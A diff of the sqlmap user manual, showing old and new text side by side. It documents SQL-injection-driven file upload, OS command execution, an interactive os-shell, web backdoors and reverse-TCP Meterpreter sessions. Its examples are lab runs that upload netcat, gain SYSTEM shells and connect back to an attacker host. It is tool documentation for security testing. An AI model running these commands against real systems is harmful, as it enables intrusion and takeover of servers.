files under '/home/inquis/sqlmap/output/ -192.168.136.131' +[hh:mm:50] [INFO] fetching file: 'C:/example.exe' +[hh:mm:50] [INFO] the SQL query provided returns 3 entries +C:/example.exe file saved to: '/tmp/sqlmap/output/192.168.136.131/files/C__example.exe' +[...] $ ls -l output/192.168.136.131/files/C__example.exe --rw-r--r-- 1 inquis inquis 2560 2009-MM-DD hh:mm output/192.168.136.131/files/C__example.exe +-rw-r--r-- 1 inquis inquis 2560 2011-MM-DD hh:mm output/192.168.136.131/files/C__example.exe $ file output/192.168.136.131/files/C__example.exe -output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel 80386 32-bit +output/192.168.136.131/files/C__example.exe: PE32 executable for MS Windows (GUI) Intel +80386 32-bit -Write a local file on the database server's file system +Upload a file to the database server's file system

    -Switches: --write-file and --dest-file +Switches: --file-write and --file-dest

    -It is possible to upload a local file to the database server file system +It is possible to upload a local file to the database server's file system when the back-end database management system is either MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the needed privileges to abuse database specific functionalities and architectural weaknesses. -The file specified can be either a text or a binary file. sqlmap will -handle it automatically. +The file specified can be either a textual or a binary file. sqlmap will +handle it properly.

    These techniques are detailed in the white paper -.

    -Example on a MySQL 5.0.67 target to upload a binary UPX-compressed -file: +Example against a MySQL target to upload a binary UPX-compressed file: $ file /tmp/nc.exe.packed @@ -4051,8 +2375,8 @@ $ file /tmp/nc.exe.packed $ ls -l /tmp/nc.exe.packed -rwxr-xr-x 1 inquis inquis 31744 2009-MM-DD hh:mm /tmp/nc.exe.packed -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --write-file \ - "/tmp/nc.exe.packed" --dest-file "C:\WINDOWS\Temp\nc.exe" -v 1 +$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" --file-write \ + "/tmp/nc.exe.packed" --file-dest "C:/WINDOWS/Temp/nc.exe" -v 1 [...] [hh:mm:29] [INFO] the back-end DBMS is MySQL @@ -4060,13 +2384,7 @@ web server operating system: Windows 2003 or 2008 web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 back-end DBMS: MySQL >= 5.0.0 -[hh:mm:29] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:29] [INFO] detecting back-end DBMS version from its banner -[hh:mm:29] [INFO] retrieved: 5.0.67 -[hh:mm:36] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:36] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:36] [INFO] retrieved: C -[hh:mm:36] [INFO] the back-end DBMS operating system is Windows +[...] do you want confirmation that the file 'C:/WINDOWS/Temp/nc.exe' has been successfully written on the back-end DBMS file system? [Y/n] y [hh:mm:52] [INFO] retrieved: 31744 @@ -4074,508 +2392,165 @@ written on the back-end DBMS file system? [Y/n] y same size as the local file '/tmp/nc.exe.packed' -

    -Example on a PostgreSQL 8.4 target to upload a text file: - -$ python sqlmap.py -u http://192.168.136.131/sqlmap/pgsql/get_int8.4.php?id=1 \ - --write-file /etc/passwd --dest-file /tmp/writtenfrompgsql -v 1 +Operating system takeover -[...] -web application technology: PHP 5.2.6, Apache 2.2.9 -back-end DBMS: PostgreSQL - -[hh:mm:01] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:01] [INFO] detecting back-end DBMS version from its banner -[hh:mm:01] [INFO] retrieved: 8.4.2 -[hh:mm:07] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:07] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:07] [INFO] retrieved: 0 -[hh:mm:07] [INFO] retrieved: 0 -[hh:mm:07] [INFO] the back-end DBMS operating system is Linux -do you want confirmation that the file '/tmp/writtenfrompgsql' has been successfully -written on the back-end DBMS file system? [Y/n] -[hh:mm:14] [INFO] retrieved: 2264 -[hh:mm:14] [INFO] the file has been successfully written and its size is 2264 bytes, -same size as the local file '/etc/passwd' - - - -Operating system access - -Execute arbitrary operating system command +Run arbitrary operating system command

    Switches: --os-cmd and --os-shell

    -It is possible to execute arbitrary commands on the underlying operating -system when the back-end database management system is either MySQL, -PostgreSQL or Microsoft SQL Server, and the session user has the needed -privileges to abuse database specific functionalities and architectural -weaknesses. +It is possible to run arbitrary commands on the database server's +underlying operating system when the back-end database management +system is either MySQL, PostgreSQL or Microsoft SQL Server, and the +session user has the needed privileges to abuse database specific +functionalities and architectural weaknesses.

    On MySQL and PostgreSQL, sqlmap uploads (via the file upload functionality explained above) a shared library (binary file) containing two user-defined functions, sys_exec() and sys_eval(), then -it creates these two functions on the database and call one of them to -execute the specified command, depending on the user's choice to display -the standard output or not. -On Microsoft SQL Server, sqlmap abuses the xp_cmshell stored -procedure: if it's disabled, sqlmap re-enables it; if it does not exist, -sqlmap creates it from scratch. +it creates these two functions on the database and calls one of them to +execute the specified command, depending on user's choice to display the +standard output or not. +On Microsoft SQL Server, sqlmap abuses the xp_cmdshell stored +procedure: if it is disabled (by default on Microsoft SQL Server >= 2005), +sqlmap re-enables it; if it does not exist, sqlmap creates it from +scratch.

    -If the user wants to retrieve the command standard output, sqlmap will use -one of the enumeration SQL injection techniques (blind or inband) to -retrieve it or, in case of stacked query SQL injection technique, -sqlmap will execute the command without returning anything to the user. +When the user requests the standard output, sqlmap uses one of the +enumeration SQL injection techniques (blind, inband or error-based) to +retrieve it. Vice versa, if the standard output is not required, stacked +query SQL injection technique is used to execute the command.

    These techniques are detailed in the white paper -.

    -It is possible to specify a single command to be executed with the ---os-cmd option. - -

    -Example on a PostgreSQL 8.3.5 target: +Example against a PostgreSQL target: -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.aspx?id=1" \ - --os-cmd "whoami" -v 1 +$ python sqlmap.py -u "http://192.168.136.131/sqlmap/pgsql/get_int.php?id=1" \ + --os-cmd id -v 1 [...] -[hh:mm:05] [INFO] the back-end DBMS is PostgreSQL -web server operating system: Windows 2003 or 2008 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 +web application technology: PHP 5.2.6, Apache 2.2.9 back-end DBMS: PostgreSQL +[hh:mm:12] [INFO] fingerprinting the back-end DBMS operating system +[hh:mm:12] [INFO] the back-end DBMS operating system is Linux +[hh:mm:12] [INFO] testing if current user is DBA +[hh:mm:12] [INFO] detecting back-end DBMS version from its banner +[hh:mm:12] [INFO] checking if UDF 'sys_eval' already exist +[hh:mm:12] [INFO] checking if UDF 'sys_exec' already exist +[hh:mm:12] [INFO] creating UDF 'sys_eval' from the binary UDF file +[hh:mm:12] [INFO] creating UDF 'sys_exec' from the binary UDF file +do you want to retrieve the command standard output? [Y/n/a] y +command standard output: 'uid=104(postgres) gid=106(postgres) groups=106(postgres)' -[hh:mm:05] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:05] [INFO] detecting back-end DBMS version from its banner -[hh:mm:05] [INFO] retrieved: 8.3.5, -[hh:mm:15] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:15] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:15] [INFO] retrieved: 1 -[hh:mm:16] [INFO] the back-end DBMS operating system is Windows -[hh:mm:16] [INFO] testing if current user is DBA -[hh:mm:16] [INFO] retrieved: 1 -[hh:mm:16] [INFO] checking if sys_exec UDF already exist -[hh:mm:16] [INFO] retrieved: 0 -[hh:mm:18] [INFO] checking if sys_eval UDF already exist -[hh:mm:18] [INFO] retrieved: 0 -[hh:mm:20] [INFO] creating sys_exec UDF from the binary UDF file -[hh:mm:20] [INFO] creating sys_eval UDF from the binary UDF file -do you want to retrieve the command standard output? [Y/n] -[hh:mm:35] [INFO] retrieved: w2k3dev\postgres -command standard output: 'w2k3dev\postgres' - - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 target: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther" \ - --os-cmd "whoami" --union-use -v 1 - -[...] -[hh:mm:58] [INFO] the back-end DBMS is Microsoft SQL Server -web server operating system: Windows 2000 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:58] [INFO] testing inband sql injection on parameter 'name' with NULL bruteforcing -technique -[hh:mm:58] [INFO] confirming full inband sql injection on parameter 'name' -[hh:mm:58] [WARNING] the target url is not affected by an exploitable full inband sql -injection vulnerability -[hh:mm:58] [INFO] confirming partial (single entry) inband sql injection on parameter 'name' -by appending a false condition after the parameter value -[hh:mm:58] [INFO] the target url is affected by an exploitable partial (single entry) inband -sql injection vulnerability -valid union: 'http://192.168.136.131/sqlmap/mssql/iis/get_str2.asp?name=luther' UNION -ALL SELECT NULL, NULL, NULL-- AND 'SonLv'='SonLv' - -[hh:mm:58] [INFO] testing stacked queries support on parameter 'name' -[hh:mm:03] [INFO] the web application supports stacked queries on parameter 'name' -[hh:mm:03] [INFO] testing if current user is DBA -[hh:mm:03] [INFO] checking if xp_cmdshell extended procedure is available, wait.. -[hh:mm:09] [INFO] xp_cmdshell extended procedure is available -do you want to retrieve the command standard output? [Y/n] -[hh:mm:11] [INFO] the SQL query provided returns 1 entries -command standard output: ---- -nt authority\network service ---- +[hh:mm:19] [INFO] cleaning up the database management system +do you want to remove UDF 'sys_eval'? [Y/n] y +do you want to remove UDF 'sys_exec'? [Y/n] y +[hh:mm:23] [INFO] database management system cleanup finished +[hh:mm:23] [WARNING] remember that UDF shared object files saved on the file system can +only be deleted manually

    It is also possible to simulate a real shell where you can type as many arbitrary commands as you wish. The option is --os-shell and has -the same TAB completion and history functionalities like ---sql-shell. +the same TAB completion and history functionalities that +--sql-shell has.

    -Example on a MySQL 5.0.67 target: +Where stacked queries has not been identified on the web application +(e.g. PHP or ASP with back-end database management system being MySQL) and +the DBMS is MySQL, it is still possible to abuse the SELECT +clause's INTO OUTFILE to create a web backdoor in a writable +folder within the web server document root and still get command +execution assuming the back-end DBMS and the web server are hosted on the +same server. +sqlmap supports this technique and allows the user to provide a +comma-separated list of possible document root sub-folders where try to +upload the web file stager and the subsequent web backdoor. Also, sqlmap +has its own tested web file stagers and backdoors for the following +languages: - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" \ - --os-shell -v 2 + +ASP +ASP.NET +JSP +PHP + -[...] -[hh:mm:36] [INFO] the back-end DBMS is MySQL -web server operating system: Windows 2003 or 2008 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 -back-end DBMS: MySQL >= 5.0.0 -[hh:mm:36] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:36] [INFO] detecting back-end DBMS version from its banner -[hh:mm:36] [DEBUG] query: IFNULL(CAST(MID((VERSION()), 1, 6) AS CHAR(10000)), CHAR(32)) -[hh:mm:36] [INFO] retrieved: 5.0.67 -[hh:mm:37] [DEBUG] performed 49 queries in 1 seconds -[hh:mm:37] [DEBUG] query: SELECT SLEEP(5) -[hh:mm:42] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:42] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:42] [DEBUG] query: CREATE TABLE sqlmapfile(data text) -[hh:mm:42] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) -[hh:mm:42] [DEBUG] query: SELECT IFNULL(CAST(MID(@@datadir, 1, 1) AS CHAR(10000)), CHAR(32)) -[hh:mm:42] [INFO] retrieved: C -[hh:mm:42] [DEBUG] performed 14 queries in 0 seconds -[hh:mm:42] [INFO] the back-end DBMS operating system is Windows -[hh:mm:42] [DEBUG] cleaning up the database management system -[hh:mm:42] [DEBUG] removing support tables -[hh:mm:42] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:42] [INFO] testing if current user is DBA -[hh:mm:42] [DEBUG] query: SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user= -(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), 1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END) -[hh:mm:42] [INFO] retrieved: 1 -[hh:mm:43] [DEBUG] performed 5 queries in 0 seconds -[hh:mm:43] [INFO] checking if sys_exec UDF already exist -[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= -CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)=CHAR(115,121,115,95,101,120,101,99)) -THEN 1 ELSE 0 END) -[hh:mm:43] [INFO] retrieved: 0 -[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds -[hh:mm:43] [INFO] checking if sys_eval UDF already exist -[hh:mm:43] [DEBUG] query: SELECT (CASE WHEN ((SELECT name FROM mysql.func WHERE name= -CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)=CHAR(115,121,115,95,101,118,97,108)) -THEN 1 ELSE 0 END) -[hh:mm:43] [INFO] retrieved: 0 -[hh:mm:43] [DEBUG] performed 14 queries in 0 seconds -[hh:mm:43] [DEBUG] going to upload the binary file with stacked query SQL injection technique -[hh:mm:43] [DEBUG] creating a support table to write the hexadecimal encoded file to -[hh:mm:43] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:43] [DEBUG] query: CREATE TABLE sqlmapfile(data longblob) -[hh:mm:43] [DEBUG] encoding file to its hexadecimal string value -[hh:mm:43] [DEBUG] forging SQL statements to write the hexadecimal encoded file to the -support table -[hh:mm:43] [DEBUG] inserting the hexadecimal encoded file to the support table -[hh:mm:43] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (0x4d5a90 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xffcbff [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x490068 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x1c5485 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x14cc63 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x207665 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x5c5379 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x0e5bc2 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x505357 [...]) -[hh:mm:43] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x000000 [...]) -[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0x696372 [...]) -[hh:mm:44] [DEBUG] query: UPDATE sqlmapfile SET data=CONCAT(data,0xdd8400 [...]) -[hh:mm:44] [DEBUG] exporting the binary file content to file './libsqlmapudftxxgk.dll' -[hh:mm:44] [DEBUG] query: SELECT data FROM sqlmapfile INTO DUMPFILE './libsqlmapudftxxgk.dll' -[hh:mm:44] [DEBUG] cleaning up the database management system -[hh:mm:44] [DEBUG] removing support tables -[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:44] [INFO] creating sys_exec UDF from the binary UDF file -[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_exec -[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_exec RETURNS int SONAME 'libsqlmapudftxxgk.dll' -[hh:mm:44] [INFO] creating sys_eval UDF from the binary UDF file -[hh:mm:44] [DEBUG] query: DROP FUNCTION sys_eval -[hh:mm:44] [DEBUG] query: CREATE FUNCTION sys_eval RETURNS string SONAME -'libsqlmapudftxxgk.dll' -[hh:mm:44] [DEBUG] creating a support table to write commands standard output to -[hh:mm:44] [DEBUG] query: DROP TABLE sqlmapoutput -[hh:mm:44] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) -[hh:mm:44] [INFO] going to use injected sys_eval and sys_exec user-defined functions for -operating system command execution -[hh:mm:44] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER -os-shell> whoami -do you want to retrieve the command standard output? [Y/n] -[hh:mm:41] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('whoami')) -[hh:mm:41] [DEBUG] query: SELECT IFNULL(CAST(data AS CHAR(10000)), CHAR(32)) FROM -sqlmapoutput -[hh:mm:41] [INFO] retrieved: nt authority\system -[hh:mm:44] [DEBUG] performed 140 queries in 2 seconds -[hh:mm:44] [DEBUG] query: DELETE FROM sqlmapoutput -command standard output: 'nt authority\system' - -os-shell> [TAB TAB] -copy del dir echo md mem move -net netstat -na ver whoami xcopy - -os-shell> exit -[hh:mm:51] [INFO] cleaning up the database management system -[hh:mm:51] [DEBUG] removing support tables -[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:51] [DEBUG] query: DROP TABLE sqlmapoutput -do you want to remove sys_exec UDF? [Y/n] n -do you want to remove sys_eval UDF? [Y/n] n -[hh:mm:04] [INFO] database management system cleanup finished -[hh:mm:04] [WARNING] remember that UDF dynamic-link library files saved on the file system -can only be deleted manually - +Out-of-band stateful connection: Meterpreter & friends

    -Now run it again, but specifying the --union-use to retrieve the -command standard output quicker, via UNION based SQL injection, when the -parameter is affected also by inband SQL injection vulnerability: - - -$ python sqlmap.py -u "http://192.168.136.131/sqlmap/mysql/get_int.aspx?id=1" \ - --os-shell -v 2 --union-use - -[...] -[hh:mm:16] [INFO] the back-end DBMS is MySQL -web server operating system: Windows 2003 or 2008 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:16] [INFO] testing inband sql injection on parameter 'id' with NULL bruteforcing -technique -[hh:mm:16] [INFO] confirming full inband sql injection on parameter 'id' -[hh:mm:16] [INFO] the target url is affected by an exploitable full inband sql injection -vulnerability -valid union: 'http://192.168.136.131/sqlmap/mysql/iis/get_int.aspx?id=1 UNION ALL SELECT -NULL, NULL, NULL# AND 528=528' - -[hh:mm:16] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:16] [INFO] detecting back-end DBMS version from its banner -[hh:mm:16] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), -MID((VERSION()), 1, 6),CHAR(117,114,115,75,117,102)), NULL# AND 3173=3173 -[hh:mm:16] [DEBUG] performed 1 queries in 0 seconds -[hh:mm:16] [DEBUG] query: SELECT SLEEP(5) -[hh:mm:21] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:21] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:21] [DEBUG] query: CREATE TABLE sqlmapfile(data text) -[hh:mm:21] [DEBUG] query: INSERT INTO sqlmapfile(data) VALUES (VERSION()) -[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77), -MID(@@datadir, 1, 1),CHAR(117,114,115,75,117,102)), NULL# AND 6574=6574 -[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds -[hh:mm:21] [INFO] the back-end DBMS operating system is Windows -[hh:mm:21] [DEBUG] cleaning up the database management system -[hh:mm:21] [DEBUG] removing support tables -[hh:mm:21] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:21] [INFO] testing if current user is DBA -[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE -WHEN ((SELECT super_priv FROM mysql.user WHERE user=(SUBSTRING_INDEX(CURRENT_USER(), CHAR(64), -1)) LIMIT 0, 1)=CHAR(89)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# AND 19=19 -[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds -[hh:mm:21] [INFO] checking if sys_exec UDF already exist -[hh:mm:21] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN -((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,120,101,99) LIMIT 0, 1)= -CHAR(115,121,115,95,101,120,101,99)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# -AND 4900=4900 -[hh:mm:21] [DEBUG] performed 1 queries in 0 seconds -sys_exec UDF already exists, do you want to overwrite it? [y/N] n -[hh:mm:24] [INFO] checking if sys_eval UDF already exist -[hh:mm:24] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),(CASE WHEN -((SELECT name FROM mysql.func WHERE name=CHAR(115,121,115,95,101,118,97,108) LIMIT 0, 1)= -CHAR(115,121,115,95,101,118,97,108)) THEN 1 ELSE 0 END),CHAR(117,114,115,75,117,102)), NULL# -AND 4437=4437 -[hh:mm:24] [DEBUG] performed 1 queries in 0 seconds -sys_eval UDF already exists, do you want to overwrite it? [y/N] n -[hh:mm:25] [DEBUG] keeping existing sys_exec UDF as requested -[hh:mm:25] [DEBUG] keeping existing sys_eval UDF as requested -[hh:mm:25] [DEBUG] creating a support table to write commands standard output to -[hh:mm:25] [DEBUG] query: DROP TABLE sqlmapoutput -[hh:mm:25] [DEBUG] query: CREATE TABLE sqlmapoutput(data longtext) -[hh:mm:25] [INFO] going to use injected sys_eval and sys_exec user-defined functions for -operating system command execution -[hh:mm:25] [INFO] calling Windows OS shell. To quit type 'x' or 'q' and press ENTER -os-shell> ipconfig -do you want to retrieve the command standard output? [Y/n] -[hh:mm:29] [DEBUG] query: INSERT INTO sqlmapoutput(data) VALUES (sys_eval('ipconfig')) -[hh:mm:29] [DEBUG] query: UNION ALL SELECT NULL, CONCAT(CHAR(83,81,73,103,75,77),IFNULL(CAST -(data AS CHAR(10000)), CHAR(32)),CHAR(117,114,115,75,117,102)), NULL FROM sqlmapoutput# AND -7106=7106 -[hh:mm:29] [DEBUG] performed 1 queries in 0 seconds -[hh:mm:29] [DEBUG] query: DELETE FROM sqlmapoutput -command standard output: ---- - -Windows IP Configuration - - -Ethernet adapter Local Area Connection 2: - - Connection-specific DNS Suffix . : localdomain - IP Address. . . . . . . . . . . . : 192.168.136.131 - Subnet Mask . . . . . . . . . . . : 255.255.255.0 ----Default Gateway . . . . . . . . . : 192.168.136.1 - -os-shell> exit -[hh:mm:41] [INFO] cleaning up the database management system -[hh:mm:41] [DEBUG] removing support tables -[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapfile -[hh:mm:41] [DEBUG] query: DROP TABLE sqlmapoutput -do you want to remove sys_exec UDF? [Y/n] n -do you want to remove sys_eval UDF? [Y/n] n -[hh:mm:54] [INFO] database management system cleanup finished -[hh:mm:54] [WARNING] remember that UDF dynamic-link library files saved on the file system -can only be deleted manually - - -

    -As you can see from this second example, sqlmap firstly check if the two -user-defined functions are already created, if so, it asks the user if he -wants to recreate them or keep them and save time. - - -Prompt for an out-of-band shell, Meterpreter or VNC - -

    -Switches: --os-pwn, --priv-esc, --msf-path and --tmp-path +Switches: --os-pwn, --os-smbrelay, +--os-bof, --priv-esc, +--msf-path and --tmp-path

    It is possible to establish an out-of-band stateful TCP connection -between the user machine and the database server underlying operating -system. This channel can be an interactive command prompt, a Meterpreter -session or a graphical user interface (VNC) session as per user's choice. +between the attacker machine and the database server underlying +operating system when the back-end database management system is either +MySQL, PostgreSQL or Microsoft SQL Server, and the session user has the +needed privileges to abuse database specific functionalities and +architectural weaknesses. +This channel can be an interactive command prompt, a Meterpreter session +or a graphical user interface (VNC) session as per user's choice. + +

    sqlmap relies on Metasploit to create the shellcode and implements four different techniques to execute it on the database server. These techniques are: Database in-memory execution of the Metasploit's shellcode via sqlmap own user-defined function sys_bineval(). Supported on -MySQL and PostgreSQL. +MySQL and PostgreSQL - switch --os-pwn. Upload and execution of a Metasploit's stand-alone payload stager via sqlmap own user-defined function sys_exec() on MySQL and PostgreSQL or via xp_cmdshell() on Microsoft SQL -Server. +Server - switch --os-pwn. Execution of Metasploit's shellcode by performing a SMB reflection attack () with a UNC path request from the database server to -the user's machine where the Metasploit smb_relay server exploit -runs. +the attacker's machine where the Metasploit smb_relay server +exploit listens. Supported when running sqlmap with high privileges +(uid=0) on Linux/Unix and the target DBMS runs as Administrator +on Windows - switch --os-smbrelay. Database in-memory execution of the Metasploit's shellcode by exploiting Microsoft SQL Server 2000 and 2005 sp_replwritetovarbin stored procedure heap-based buffer overflow () with automatic DEP bypass. +name="MS09-004">). sqlmap has its own exploit to trigger the +vulnerability with automatic DEP memory protection bypass, but it relies +on Metasploit to generate the shellcode to get executed upon successful +exploitation - switch --os-bof. -

    -Note that this feature is not supported by sqlmap running on Windows -because it relies on Metasploit's msfcli which is not -available for Windows. -

    These techniques are detailed in the white paper - and in the slide deck .

    -Example on a MySQL 5.1 target: +Example against a MySQL target: $ python sqlmap.py -u "http://192.168.136.128/sqlmap/mysql/get_int_51.aspx?id=1" \ - --os-pwn -v 1 --msf-path /home/inquis/software/metasploit + --os-pwn -v 1 --msf-path /tmp/metasploit [...] -web server operating system: Windows 2003 or 2008 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727 -back-end DBMS: MySQL >= 5.0.0 - -[hh:mm:09] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:09] [INFO] detecting back-end DBMS version from its banner -[hh:mm:09] [INFO] retrieved: 5.1.30 -[hh:mm:18] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:18] [INFO] fingerprinting the back-end DBMS operating system -[hh:mm:18] [INFO] retrieved: C -[hh:mm:19] [INFO] the back-end DBMS operating system is Windows -[hh:mm:19] [INFO] testing if current user is DBA -[hh:mm:19] [INFO] retrieved: 1 -[hh:mm:20] [INFO] checking if UDF 'sys_bineval' already exist -[hh:mm:20] [INFO] retrieved: 0 -[hh:mm:21] [INFO] checking if UDF 'sys_exec' already exist -[hh:mm:21] [INFO] retrieved: 0 -[hh:mm:21] [INFO] retrieving MySQL base directory absolute path -[hh:mm:21] [INFO] retrieved: C:\Program Files\MySQL\MySQL Server 5.1\ -[hh:mm:46] [WARNING] this will only work if the database administrator created manually -the 'C:/Program Files/MySQL/MySQL Server 5.1/lib/plugin' subfolder -[hh:mm:47] [INFO] creating UDF 'sys_bineval' from the binary UDF file -[hh:mm:47] [INFO] creating UDF 'sys_exec' from the binary UDF file -how do you want to execute the Metasploit shellcode on the back-end database underlying -operating system? -[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default) -[2] Stand-alone payload stager (file system way) -> 1 -[hh:mm:51] [INFO] creating Metasploit Framework 3 multi-stage shellcode -which connection type do you want to use? -[1] Reverse TCP: Connect back from the database host to this machine (default) -[2] Reverse TCP: Try to connect back from the database host to this machine, on all ports -between the specified and 65535 -[3] Bind TCP: Listen on the database host for a connection -> 1 -which is the local address? [192.168.136.1] -which local port number do you want to use? [47776] -which payload do you want to use? -[1] Meterpreter (default) -[2] Shell -[3] VNC -> 1 -[hh:mm:55] [INFO] creation in progress .............................................. done -[hh:mm:41] [INFO] running Metasploit Framework 3 command line interface locally, wait.. -[*] Please wait while we load the module tree... -[*] Started reverse handler on 192.168.136.1:47776 -[*] Starting the payload handler... -[hh:mm:22] [INFO] running Metasploit Framework 3 shellcode remotely via UDF 'sys_bineval', wait.. -[*] Sending stage (748032 bytes) -[*] Meterpreter session 1 opened (192.168.136.1:47776 -> 192.168.136.128:2176) - -meterpreter > Loading extension espia...success. -meterpreter > Loading extension incognito...success. -meterpreter > Loading extension priv...success. -meterpreter > Loading extension sniffer...success. -meterpreter > Computer: W2K3DEV -OS : Windows .NET Server (Build 3790, Service Pack 2). -Arch : x86 -Language: en_US -meterpreter > Server username: NT AUTHORITY\SYSTEM -meterpreter > ipconfig - -MS TCP Loopback interface -Hardware MAC: 00:00:00:00:00:00 -IP Address : 127.0.0.1 -Netmask : 255.0.0.0 - - - -VMware Accelerated AMD PCNet Adapter #2 -Hardware MAC: 00:0c:29:86:69:1b -IP Address : 192.168.136.128 -Netmask : 255.255.255.0 - - -meterpreter > exit - -[hh:mm:52] [INFO] cleaning up the database management system -do you want to remove UDF 'sys_bineval'? [Y/n] -do you want to remove UDF 'sys_exec'? [Y/n] -[hh:mm:54] [INFO] database management system cleanup finished -[hh:mm:54] [WARNING] remember that UDF dynamic-link library files and Metasploit related -files in the temporary folder saved on the file system can only be deleted manually +TODO

    @@ -4585,408 +2560,24 @@ Microsoft SQL Server 2000 by default runs as SYSTEM, whereas Microsoft SQL Server 2005 and 2008 run most of the times as NETWORK SERVICE and sometimes as LOCAL SERVICE. +

    It is possible to provide sqlmap with the --priv-esc -option to perform a database process' user privilege escalation +switch to perform a database process' user privilege escalation via Metasploit's getsystem command which include, among others, the technique () or via by using Meterpreter's - extension. - -

    -Example on a Microsoft SQL Server 2005 Service Pack 0 running as -NETWORK SERVICE on the target: - - -$ python sqlmap.py -u "http://192.168.136.128/sqlmap/mssql/iis/get_int.asp?id=1" \ - --os-pwn -v 1 --msf-path /home/inquis/software/metasploit --priv-esc - -[...] -web server operating system: Windows 2000 -web application technology: ASP.NET, Microsoft IIS 6.0, ASP -back-end DBMS: Microsoft SQL Server 2005 - -[hh:mm:47] [INFO] testing stacked queries support on parameter 'id' -[hh:mm:52] [INFO] the web application supports stacked queries on parameter 'id' -[hh:mm:52] [INFO] testing if current user is DBA -[hh:mm:52] [INFO] retrieved: 1 -[hh:mm:52] [INFO] checking if xp_cmdshell extended procedure is available, wait.. -[hh:mm:01] [INFO] xp_cmdshell extended procedure is available -[hh:mm:01] [INFO] creating Metasploit Framework 3 payload stager -which connection type do you want to use? -[1] Reverse TCP: Connect back from the database host to this machine (default) -[2] Reverse TCP: Try 